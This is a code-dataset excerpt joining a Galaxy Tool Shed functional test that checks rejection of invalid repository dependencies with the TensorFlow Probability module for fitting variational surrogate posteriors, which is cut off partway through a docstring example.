gr-digital/python/digital/gfsk.py
|
Python
|
gpl-3.0
| 10,789
|
[
"Gaussian"
] |
43b463174f42236c3a97261e77dc45ed3d35ed09e2c653cdb8a27ee6cf4c1de7
|
from tool_shed.base.twilltestcase import ShedTwillTestCase, common, os
datatypes_repository_name = 'emboss_datatypes_0110'
datatypes_repository_description = "Galaxy applicable data formats used by Emboss tools."
datatypes_repository_long_description = "Galaxy applicable data formats used by Emboss tools. This repository contains no tools."
emboss_repository_name = 'emboss_0110'
emboss_repository_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
emboss_repository_long_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
category_name = 'Test 0110 Invalid Repository Dependencies'
category_desc = 'Test 0110 Invalid Repository Dependencies'
running_standalone = False
class TestBasicRepositoryDependencies( ShedTwillTestCase ):
'''Testing emboss 5 with repository dependencies.'''
def test_0000_initiate_users( self ):
"""Create necessary user accounts and login as an admin user."""
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
test_user_1 = self.test_db_util.get_user( common.test_user_1_email )
assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % common.test_user_1_email
test_user_1_private_role = self.test_db_util.get_private_role( test_user_1 )
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
admin_user = self.test_db_util.get_user( common.admin_email )
assert admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
admin_user_private_role = self.test_db_util.get_private_role( admin_user )
def test_0005_create_category( self ):
"""Create a category for this test suite"""
self.create_category( name=category_name, description=category_desc )
def test_0010_create_emboss_datatypes_repository_and_upload_tarball( self ):
'''Create and populate the emboss_datatypes repository.'''
global running_standalone
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=datatypes_repository_name,
description=datatypes_repository_description,
long_description=datatypes_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
if self.repository_is_new( repository ):
running_standalone = True
self.upload_file( repository,
filename='emboss/datatypes/datatypes_conf.xml',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded datatypes_conf.xml.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0015_verify_datatypes_in_datatypes_repository( self ):
'''Verify that the emboss_datatypes repository contains datatype entries.'''
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
self.display_manage_repository_page( repository, strings_displayed=[ 'Datatypes', 'equicktandem', 'hennig86', 'vectorstrip' ] )
def test_0020_create_emboss_5_repository_and_upload_files( self ):
'''Create and populate the emboss_5_0110 repository.'''
global running_standalone
if running_standalone:
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=emboss_repository_name,
description=emboss_repository_description,
long_description=emboss_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/emboss.tar',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded emboss tool tarball.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0025_generate_repository_dependency_with_invalid_url( self ):
'''Generate a repository dependency for emboss 5 with an invalid URL.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
datatypes_repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = 'http://http://this is not an url!'
name = datatypes_repository.name
owner = datatypes_repository.user.username
changeset_revision = self.get_repository_tip( datatypes_repository )
strings_displayed = [ 'Repository dependencies are currently supported only within the same tool shed' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0030_generate_repository_dependency_with_invalid_name( self ):
'''Generate a repository dependency for emboss 5 with an invalid name.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = '!?invalid?!'
owner = repository.user.username
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the name is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0035_generate_repository_dependency_with_invalid_owner( self ):
'''Generate a repository dependency for emboss 5 with an invalid owner.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = '!?invalid?!'
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the owner is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0040_generate_repository_dependency_with_invalid_changeset_revision( self ):
'''Generate a repository dependency for emboss 5 with an invalid changeset revision.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple', 'invalid' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = repository.user.username
changeset_revision = '!?invalid?!'
strings_displayed = [ 'because the changeset revision is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0045_install_repository_with_invalid_repository_dependency( self ):
'''Install the repository and verify that galaxy detects invalid repository dependencies.'''
self.galaxy_logout()
self.galaxy_login( email=common.admin_email, username=common.admin_username )
repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
preview_strings_displayed = [ 'emboss_0110', self.get_repository_tip( repository ), 'Ignoring repository dependency definition' ]
self.install_repository( emboss_repository_name,
common.test_user_1_name,
category_name,
install_tool_dependencies=False,
install_repository_dependencies=True,
preview_strings_displayed=preview_strings_displayed,
post_submit_strings_displayed=[ repository.name, repository.name, 'New' ],
includes_tools_for_display_in_tool_panel=True )
installed_repository = self.test_db_util.get_installed_repository_by_name_owner( emboss_repository_name, common.test_user_1_name )
self.display_installed_repository_manage_page( installed_repository=installed_repository,
strings_displayed=[],
strings_not_displayed=[ 'Repository dependencies' ] )
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/test/tool_shed/functional/test_1110_install_repository_with_invalid_repository_dependency.py
|
Python
|
gpl-3.0
| 12,412
|
[
"Galaxy"
] |
0f26b1e7a45e37c765ecdb45a8c96633d7f13bf91b25a16cb899ce2af5629f1d
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utilities for fitting variational distributions."""
import functools
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import math as tfp_math
from tensorflow_probability.python.vi import csiszar_divergence
from tensorflow.python.util import deprecation # pylint: disable=g-direct-tensorflow-import
_trace_loss = lambda traceable_quantities: traceable_quantities.loss
def fit_surrogate_posterior_stateless(
target_log_prob_fn,
build_surrogate_posterior_fn,
initial_parameters,
optimizer,
num_steps,
convergence_criterion=None,
trace_fn=_trace_loss,
discrepancy_fn=csiszar_divergence.kl_reverse,
sample_size=1,
importance_sample_size=1,
gradient_estimator=csiszar_divergence.GradientEstimators.REPARAMETERIZATION,
jit_compile=False,
seed=None,
name='fit_surrogate_posterior'):
"""Fit a surrogate posterior to a target (unnormalized) log density.
The default behavior constructs and minimizes the negative variational
evidence lower bound (ELBO), given by
```python
q_samples = surrogate_posterior.sample(num_draws)
elbo_loss = -tf.reduce_mean(
target_log_prob_fn(q_samples) - surrogate_posterior.log_prob(q_samples))
```
This corresponds to minimizing the 'reverse' Kullback-Leibler divergence
(`KL[q||p]`) between the variational distribution and the unnormalized
`target_log_prob_fn`, and defines a lower bound on the marginal log
likelihood, `log p(x) >= -elbo_loss`. [1]
More generally, this function supports fitting variational distributions that
minimize any
[Csiszar f-divergence](https://en.wikipedia.org/wiki/F-divergence).
Args:
target_log_prob_fn: Python callable that takes a set of `Tensor` arguments
and returns a `Tensor` log-density. Given
`q_sample = surrogate_posterior.sample(sample_size)`, this
will be called as `target_log_prob_fn(*q_sample)` if `q_sample` is a list
or a tuple, `target_log_prob_fn(**q_sample)` if `q_sample` is a
dictionary, or `target_log_prob_fn(q_sample)` if `q_sample` is a `Tensor`.
It should support batched evaluation, i.e., should return a result of
shape `[sample_size]`.
build_surrogate_posterior_fn: Python `callable` that takes parameter values
and returns an instance of `tfd.Distribution`.
initial_parameters: List or tuple of initial parameter values (`Tensor`s or
structures of `Tensor`s), passed as positional arguments to
`build_surrogate_posterior_fn`.
optimizer: Pure functional optimizer to use. This may be an
`optax.GradientTransformation` instance (in JAX), or any similar object
that implements methods
`optimizer_state = optimizer.init(parameters)` and
`updates, optimizer_state = optimizer.update(grads, optimizer_state,
parameters)`.
num_steps: Python `int` number of steps to run the optimizer.
convergence_criterion: Optional instance of
`tfp.optimizer.convergence_criteria.ConvergenceCriterion`
representing a criterion for detecting convergence. If `None`,
the optimization will run for `num_steps` steps, otherwise, it will run
for at *most* `num_steps` steps, as determined by the provided criterion.
Default value: `None`.
trace_fn: Python callable with signature `traced_values = trace_fn(
traceable_quantities)`, where the argument is an instance of
`tfp.math.MinimizeTraceableQuantities` and the returned `traced_values`
may be a `Tensor` or nested structure of `Tensor`s. The traced values are
stacked across steps and returned.
The default `trace_fn` simply returns the loss. In general, trace
functions may also examine the gradients, values of parameters,
the state propagated by the specified `convergence_criterion`, if any (if
no convergence criterion is specified, this will be `None`).
Default value: `lambda traceable_quantities: traceable_quantities.loss`.
discrepancy_fn: Python `callable` representing a Csiszar `f` function
in log-space. See the docs for `tfp.vi.monte_carlo_variational_loss` for
examples.
Default value: `tfp.vi.kl_reverse`.
sample_size: Python `int` number of Monte Carlo samples to use
in estimating the variational divergence. Larger values may stabilize
the optimization, but at higher cost per step in time and memory.
Default value: `1`.
importance_sample_size: Python `int` number of terms used to define an
importance-weighted divergence. If `importance_sample_size > 1`, then the
`surrogate_posterior` is optimized to function as an importance-sampling
proposal distribution. In this case, posterior expectations should be
approximated by importance sampling, as demonstrated in the example below.
Default value: `1`.
gradient_estimator: Optional element from `tfp.vi.GradientEstimators`
specifying the stochastic gradient estimator to associate with the
variational loss.
Default value: `csiszar_divergence.GradientEstimators.REPARAMETERIZATION`.
jit_compile: If True, compiles the loss function and gradient update using
XLA. XLA performs compiler optimizations, such as fusion, and attempts to
emit more efficient code. This may drastically improve the performance.
See the docs for `tf.function`. (In JAX, this will apply `jax.jit`).
Default value: `False`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
name: Python `str` name prefixed to ops created by this function.
Default value: 'fit_surrogate_posterior'.
Returns:
optimized_parameters: Tuple of optimized parameter values, with the same
structure and `Tensor` shapes as `initial_parameters`.
results: `Tensor` or nested structure of `Tensor`s, according to the return
type of `trace_fn`. Each `Tensor` has an added leading dimension of size
`num_steps`, packing the trajectory of the result over the course of the
optimization.
#### Examples
**Normal-Normal model**. We'll first consider a simple model
`z ~ N(0, 1)`, `x ~ N(z, 1)`, where we suppose we are interested in the
posterior `p(z | x=5)`:
```python
import tensorflow_probability as tfp
from tensorflow_probability import distributions as tfd
def log_prob(z, x):
return tfd.Normal(0., 1.).log_prob(z) + tfd.Normal(z, 1.).log_prob(x)
conditioned_log_prob = lambda z: log_prob(z, x=5.)
```
The posterior is itself normal by [conjugacy](
https://en.wikipedia.org/wiki/Conjugate_prior), and can be computed
analytically (it's `N(loc=5/2., scale=1/sqrt(2))`). But suppose we don't want
to bother doing the math: we can use variational inference instead!
```python
import optax # Requires JAX backend.
init_normal, build_normal = tfp.experimental.util.make_trainable_stateless(
tfd.Normal, name='q_z')
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
optimizer=optax.adam(learning_rate=0.1),
num_steps=100,
seed=(42, 42))
q_z = build_normal(*optimized_parameters)
```
**Custom loss function**. Suppose we prefer to fit the same model using
the forward KL divergence `KL[p||q]`. We can pass a custom discrepancy
function:
```python
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
optimizer=optax.adam(learning_rate=0.1),
num_steps=100,
seed=(42, 42),
discrepancy_fn=tfp.vi.kl_forward)
q_z = build_normal(*optimized_parameters)
```
Note that in practice this may have substantially higher-variance gradients
than the reverse KL.
**Importance weighting**. A surrogate posterior may be corrected by
interpreting it as a proposal for an [importance sampler](
https://en.wikipedia.org/wiki/Importance_sampling). That is, one can use
weighted samples from the surrogate to estimate expectations under the true
posterior:
```python
zs, q_log_prob = surrogate_posterior.experimental_sample_and_log_prob(
num_samples, seed=(42, 42))
# Naive expectation under the surrogate posterior.
expected_x = tf.reduce_mean(f(zs), axis=0)
# Importance-weighted estimate of the expectation under the true posterior.
self_normalized_log_weights = tf.nn.log_softmax(
target_log_prob_fn(zs) - q_log_prob)
expected_x = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * f(zs),
axis=0)
```
Any distribution may be used as a proposal, but it is often natural to
consider surrogates that were themselves fit by optimizing an
importance-weighted variational objective [2], which directly optimizes the
surrogate's effectiveness as a proposal distribution. This may be specified
by passing `importance_sample_size > 1`. The importance-weighted objective
may favor different characteristics than the original objective.
For example, effective proposals are generally overdispersed, whereas a
surrogate optimizing reverse KL would otherwise tend to be underdispersed.
Although importance sampling is guaranteed to tighten the variational bound,
some research has found that this does not necessarily improve the quality
of deep generative models, because it also introduces gradient noise that can
lead to a weaker training signal [3]. As always, evaluation is important to
choose the approach that works best for a particular task.
When using an importance-weighted loss to fit a surrogate, it is also
recommended to apply importance sampling when computing expectations
under that surrogate.
```python
# Fit `q` with an importance-weighted variational loss.
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
importance_sample_size=10,
optimizer=optax.adam(0.1),
num_steps=200,
seed=(42, 42))
q_z = build_normal(*optimized_parameters)
# Estimate posterior statistics with importance sampling.
zs, q_log_prob = q_z.experimental_sample_and_log_prob(1000, seed=(42, 42))
self_normalized_log_weights = tf.nn.log_softmax(
conditioned_log_prob(zs) - q_log_prob)
posterior_mean = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * zs,
axis=0)
posterior_variance = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * (zs - posterior_mean)**2,
axis=0)
```
**Inhomogeneous Poisson Process**. For a more interesting example, let's
consider a model with multiple latent variables as well as trainable
parameters in the model itself. Given observed counts `y` from spatial
locations `X`, consider an inhomogeneous Poisson process model
`log_rates = GaussianProcess(index_points=X); y = Poisson(exp(log_rates))`
in which the latent (log) rates are spatially correlated following a Gaussian
process:
```python
# Toy 1D data.
index_points = np.array([-10., -7.2, -4., -0.1, 0.1, 4., 6.2, 9.]).reshape(
[-1, 1]).astype(np.float32)
observed_counts = np.array(
[100, 90, 60, 13, 18, 37, 55, 42]).astype(np.float32)
# Generative model.
def model_fn():
kernel_amplitude = yield tfd.LogNormal(
loc=0., scale=1., name='kernel_amplitude')
kernel_lengthscale = yield tfd.LogNormal(
loc=0., scale=1., name='kernel_lengthscale')
observation_noise_scale = yield tfd.LogNormal(
loc=0., scale=1., name='observation_noise_scale')
kernel = tfp.math.psd_kernels.ExponentiatedQuadratic(
amplitude=kernel_amplitude,
length_scale=kernel_lengthscale)
latent_log_rates = yield tfd.GaussianProcess(
kernel,
index_points=index_points,
observation_noise_variance=observation_noise_scale,
name='latent_log_rates')
y = yield tfd.Independent(tfd.Poisson(log_rate=latent_log_rates),
reinterpreted_batch_ndims=1,
name='y')
model = tfd.JointDistributionCoroutineAutoBatched(model_fn)
pinned = model.experimental_pin(y=observed_counts)
```
Next we define a variational family. This is represented statelessly
as a `build_surrogate_posterior_fn` from raw (unconstrained) parameters to
a surrogate posterior distribution. Note that common variational families can
be constructed automatically using the utilities in `tfp.experimental.vi`;
here we demonstrate a manual approach.
```python
initial_parameters = (0., 0., 0., # Raw kernel parameters.
tf.zeros_like(observed_counts), # `logit_locs`
tf.zeros_like(observed_counts)) # `logit_raw_scales`
def build_surrogate_posterior_fn(
raw_kernel_amplitude, raw_kernel_lengthscale, raw_observation_noise_scale,
logit_locs, logit_raw_scales):
def variational_model_fn():
# Fit the kernel parameters as point masses.
yield tfd.Deterministic(
tf.nn.softplus(raw_kernel_amplitude), name='kernel_amplitude')
yield tfd.Deterministic(
tf.nn.softplus(raw_kernel_lengthscale), name='kernel_lengthscale')
yield tfd.Deterministic(
tf.nn.softplus(raw_observation_noise_scale),
name='kernel_observation_noise_scale')
# Factored normal posterior over the GP logits.
yield tfd.Independent(
tfd.Normal(loc=logit_locs,
scale=tf.nn.softplus(logit_raw_scales)),
reinterpreted_batch_ndims=1,
name='latent_log_rates')
return tfd.JointDistributionCoroutineAutoBatched(variational_model_fn)
```
Finally, we fit the variational posterior and model variables jointly. We'll
use a custom `trace_fn` to see how the kernel amplitudes and a set of sampled
latent rates with fixed seed evolve during the course of the optimization:
```python
[
optimized_parameters,
(losses, amplitude_path, sample_path)
] = tfp.vi.fit_surrogate_posterior_stateless(
target_log_prob_fn=pinned.unnormalized_log_prob,
build_surrogate_posterior_fn=build_surrogate_posterior_fn,
initial_parameters=initial_parameters,
optimizer=optax.adam(learning_rate=0.1),
sample_size=1,
num_steps=500,
trace_fn=lambda traceable_quantities: ( # pylint: disable=g-long-lambda
traceable_quantities.loss,
tf.nn.softplus(traceable_quantities.parameters[0]),
build_surrogate_posterior_fn(
*traceable_quantities.parameters).sample(
5, seed=(42, 42))[-1]),
seed=(42, 42))
surrogate_posterior = build_surrogate_posterior_fn(*optimized_parameters)
```
#### References
[1]: Christopher M. Bishop. Pattern Recognition and Machine Learning.
Springer, 2006.
[2] Yuri Burda, Roger Grosse, and Ruslan Salakhutdinov. Importance Weighted
Autoencoders. In _International Conference on Learning
Representations_, 2016. https://arxiv.org/abs/1509.00519
[3] Tom Rainforth, Adam R. Kosiorek, Tuan Anh Le, Chris J. Maddison,
Maximilian Igl, Frank Wood, and Yee Whye Teh. Tighter Variational Bounds
are Not Necessarily Better. In _International Conference on Machine
Learning (ICML)_, 2018. https://arxiv.org/abs/1802.04537
"""
def variational_loss_fn(*parameters, seed=None):
surrogate_posterior = build_surrogate_posterior_fn(*parameters)
stopped_surrogate_posterior = None
if (gradient_estimator ==
csiszar_divergence.GradientEstimators.DOUBLY_REPARAMETERIZED):
stopped_surrogate_posterior = build_surrogate_posterior_fn(
*tf.nest.map_structure(tf.stop_gradient, parameters))
return csiszar_divergence.monte_carlo_variational_loss(
target_log_prob_fn,
surrogate_posterior=surrogate_posterior,
discrepancy_fn=discrepancy_fn,
importance_sample_size=importance_sample_size,
sample_size=sample_size,
gradient_estimator=gradient_estimator,
stopped_surrogate_posterior=stopped_surrogate_posterior,
seed=seed)
return tfp_math.minimize_stateless(
variational_loss_fn,
init=initial_parameters,
num_steps=num_steps,
optimizer=optimizer,
convergence_criterion=convergence_criterion,
trace_fn=trace_fn,
jit_compile=jit_compile,
seed=seed,
name=name)
@deprecation.deprecated_args(
'2022-03-01',
'Custom loss functions are no longer supported in '
'`fit_surrogate_posterior`. Instead, use the `discrepancy_fn` argument to '
'specify a custom divergence, or pass a custom loss directly to '
'`tfp.math.minimize` as '
'`loss_fn=functools.partial(variational_loss_fn, '
'target_log_prob_fn=target_log_prob_fn, '
'surrogate_posterior=surrogate_posterior, '
'sample_size=sample_size)`.',
'variational_loss_fn')
def fit_surrogate_posterior(target_log_prob_fn,
surrogate_posterior,
optimizer,
num_steps,
convergence_criterion=None,
trace_fn=_trace_loss,
variational_loss_fn=None,
discrepancy_fn=csiszar_divergence.kl_reverse,
sample_size=1,
importance_sample_size=1,
trainable_variables=None,
jit_compile=None,
seed=None,
name='fit_surrogate_posterior'):
"""Fit a surrogate posterior to a target (unnormalized) log density.
The default behavior constructs and minimizes the negative variational
evidence lower bound (ELBO), given by
```python
q_samples = surrogate_posterior.sample(num_draws)
elbo_loss = -tf.reduce_mean(
target_log_prob_fn(q_samples) - surrogate_posterior.log_prob(q_samples))
```
This corresponds to minimizing the 'reverse' Kullback-Leibler divergence
(`KL[q||p]`) between the variational distribution and the unnormalized
`target_log_prob_fn`, and defines a lower bound on the marginal log
likelihood, `log p(x) >= -elbo_loss`. [1]
More generally, this function supports fitting variational distributions that
minimize any
[Csiszar f-divergence](https://en.wikipedia.org/wiki/F-divergence).
Args:
target_log_prob_fn: Python callable that takes a set of `Tensor` arguments
and returns a `Tensor` log-density. Given
`q_sample = surrogate_posterior.sample(sample_size)`, this
will be called as `target_log_prob_fn(*q_sample)` if `q_sample` is a list
or a tuple, `target_log_prob_fn(**q_sample)` if `q_sample` is a
dictionary, or `target_log_prob_fn(q_sample)` if `q_sample` is a `Tensor`.
It should support batched evaluation, i.e., should return a result of
shape `[sample_size]`.
surrogate_posterior: A `tfp.distributions.Distribution`
instance defining a variational posterior (could be a
`tfd.JointDistribution`). Crucially, the distribution's `log_prob` and
(if reparameterized) `sample` methods must directly invoke all ops
that generate gradients to the underlying variables. One way to ensure
this is to use `tfp.util.TransformedVariable` and/or
`tfp.util.DeferredTensor` to represent any parameters defined as
transformations of unconstrained variables, so that the transformations
execute at runtime instead of at distribution creation.
optimizer: Optimizer instance to use. This may be a TF1-style
`tf.train.Optimizer`, TF2-style `tf.optimizers.Optimizer`, or any Python
object that implements `optimizer.apply_gradients(grads_and_vars)`.
num_steps: Python `int` number of steps to run the optimizer.
convergence_criterion: Optional instance of
`tfp.optimizer.convergence_criteria.ConvergenceCriterion`
representing a criterion for detecting convergence. If `None`,
the optimization will run for `num_steps` steps, otherwise, it will run
for at *most* `num_steps` steps, as determined by the provided criterion.
Default value: `None`.
trace_fn: Python callable with signature `traced_values = trace_fn(
traceable_quantities)`, where the argument is an instance of
`tfp.math.MinimizeTraceableQuantities` and the returned `traced_values`
may be a `Tensor` or nested structure of `Tensor`s. The traced values are
stacked across steps and returned.
The default `trace_fn` simply returns the loss. In general, trace
functions may also examine the gradients, values of parameters,
the state propagated by the specified `convergence_criterion`, if any (if
no convergence criterion is specified, this will be `None`),
as well as any other quantities captured in the closure of `trace_fn`,
for example, statistics of a variational distribution.
Default value: `lambda traceable_quantities: traceable_quantities.loss`.
variational_loss_fn: Optional Python `callable` with signature
`loss = variational_loss_fn(target_log_prob_fn, surrogate_posterior,
sample_size, seed)` defining a variational loss function. The default is
a Monte Carlo approximation to the standard evidence lower bound (ELBO),
equivalent to minimizing the 'reverse' `KL[q||p]` divergence between the
surrogate `q` and true posterior `p`. [1]
Default value: `None` (equivalent to `functools.partial(
tfp.vi.monte_carlo_variational_loss,
discrepancy_fn=tfp.vi.kl_reverse,
importance_sample_size=importance_sample_size,
use_reparameterization=True)`).
discrepancy_fn: Python `callable` representing a Csiszar `f` function
in log-space. See the docs for `tfp.vi.monte_carlo_variational_loss` for
examples. This argument is ignored if a `variational_loss_fn` is
explicitly specified.
Default value: `tfp.vi.kl_reverse`.
sample_size: Python `int` number of Monte Carlo samples to use
in estimating the variational divergence. Larger values may stabilize
the optimization, but at higher cost per step in time and memory.
Default value: `1`.
importance_sample_size: Python `int` number of terms used to define an
importance-weighted divergence. If `importance_sample_size > 1`, then the
`surrogate_posterior` is optimized to function as an importance-sampling
proposal distribution. In this case, posterior expectations should be
approximated by importance sampling, as demonstrated in the example below.
This argument is ignored if a `variational_loss_fn` is explicitly
specified.
Default value: `1`.
trainable_variables: Optional list of `tf.Variable` instances to optimize
with respect to. If `None`, defaults to the set of all variables accessed
during the computation of the variational bound, i.e., those defining
`surrogate_posterior` and the model `target_log_prob_fn`.
Default value: `None`
jit_compile: If True, compiles the loss function and gradient update using
XLA. XLA performs compiler optimizations, such as fusion, and attempts to
emit more efficient code. This may drastically improve the performance.
See the docs for `tf.function`. (In JAX, this will apply `jax.jit`).
Default value: `None`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
name: Python `str` name prefixed to ops created by this function.
Default value: 'fit_surrogate_posterior'.
Returns:
results: `Tensor` or nested structure of `Tensor`s, according to the return
type of `trace_fn`. Each `Tensor` has an added leading dimension of size
`num_steps`, packing the trajectory of the result over the course of the
optimization.
#### Examples
**Normal-Normal model**. We'll first consider a simple model
`z ~ N(0, 1)`, `x ~ N(z, 1)`, where we suppose we are interested in the
posterior `p(z | x=5)`:
```python
import tensorflow_probability as tfp
from tensorflow_probability import distributions as tfd
def log_prob(z, x):
return tfd.Normal(0., 1.).log_prob(z) + tfd.Normal(z, 1.).log_prob(x)
conditioned_log_prob = lambda z: log_prob(z, x=5.)
```
The posterior is itself normal by [conjugacy](
https://en.wikipedia.org/wiki/Conjugate_prior), and can be computed
analytically (it's `N(loc=5/2., scale=1/sqrt(2))`). But suppose we don't want
to bother doing the math: we can use variational inference instead!
```python
q_z = tfp.experimental.util.make_trainable(tfd.Normal, name='q_z')
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=100)
print(q_z.mean(), q_z.stddev()) # => approximately [2.5, 1/sqrt(2)]
```
**Custom loss function**. Suppose we prefer to fit the same model using
the forward KL divergence `KL[p||q]`. We can pass a custom discrepancy
function:
```python
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=100,
discrepancy_fn=tfp.vi.kl_forward)
```
Note that in practice this may have substantially higher-variance gradients
than the reverse KL.
**Importance weighting**. A surrogate posterior may be corrected by
interpreting it as a proposal for an [importance sampler](
https://en.wikipedia.org/wiki/Importance_sampling). That is, one can use
weighted samples from the surrogate to estimate expectations under the true
posterior:
```python
zs, q_log_prob = surrogate_posterior.experimental_sample_and_log_prob(
num_samples)
# Naive expectation under the surrogate posterior.
expected_x = tf.reduce_mean(f(zs), axis=0)
# Importance-weighted estimate of the expectation under the true posterior.
self_normalized_log_weights = tf.nn.log_softmax(
target_log_prob_fn(zs) - q_log_prob)
expected_x = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * f(zs),
axis=0)
```
Any distribution may be used as a proposal, but it is often natural to
consider surrogates that were themselves fit by optimizing an
importance-weighted variational objective [2], which directly optimizes the
surrogate's effectiveness as a proposal distribution. This may be specified
by passing `importance_sample_size > 1`. The importance-weighted objective
may favor different characteristics than the original objective.
For example, effective proposals are generally overdispersed, whereas a
surrogate optimizing reverse KL would otherwise tend to be underdispersed.
Although importance sampling is guaranteed to tighten the variational bound,
some research has found that this does not necessarily improve the quality
of deep generative models, because it also introduces gradient noise that can
lead to a weaker training signal [3]. As always, evaluation is important to
choose the approach that works best for a particular task.
When using an importance-weighted loss to fit a surrogate, it is also
recommended to apply importance sampling when computing expectations
under that surrogate.
```python
# Fit `q` with an importance-weighted variational loss.
losses = tfp.vi.fit_surrogate_posterior(
conditioned_log_prob,
surrogate_posterior=q_z,
importance_sample_size=10,
optimizer=tf.optimizers.Adam(learning_rate=0.1),
num_steps=200)
# Estimate posterior statistics with importance sampling.
zs, q_log_prob = q_z.experimental_sample_and_log_prob(1000)
self_normalized_log_weights = tf.nn.log_softmax(
conditioned_log_prob(zs) - q_log_prob)
posterior_mean = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * zs,
axis=0)
posterior_variance = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * (zs - posterior_mean)**2,
axis=0)
```
**Inhomogeneous Poisson Process**. For a more interesting example, let's
consider a model with multiple latent variables as well as trainable
parameters in the model itself. Given observed counts `y` from spatial
locations `X`, consider an inhomogeneous Poisson process model
`log_rates = GaussianProcess(index_points=X); y = Poisson(exp(log_rates))`
in which the latent (log) rates are spatially correlated following a Gaussian
process. We'll fit a variational model to the latent rates while also
optimizing the GP kernel hyperparameters (largely for illustration; in
practice we might prefer to 'be Bayesian' about these parameters and include
them as latents in our model and variational posterior). First we define
the model, including trainable variables:
```python
# Toy 1D data.
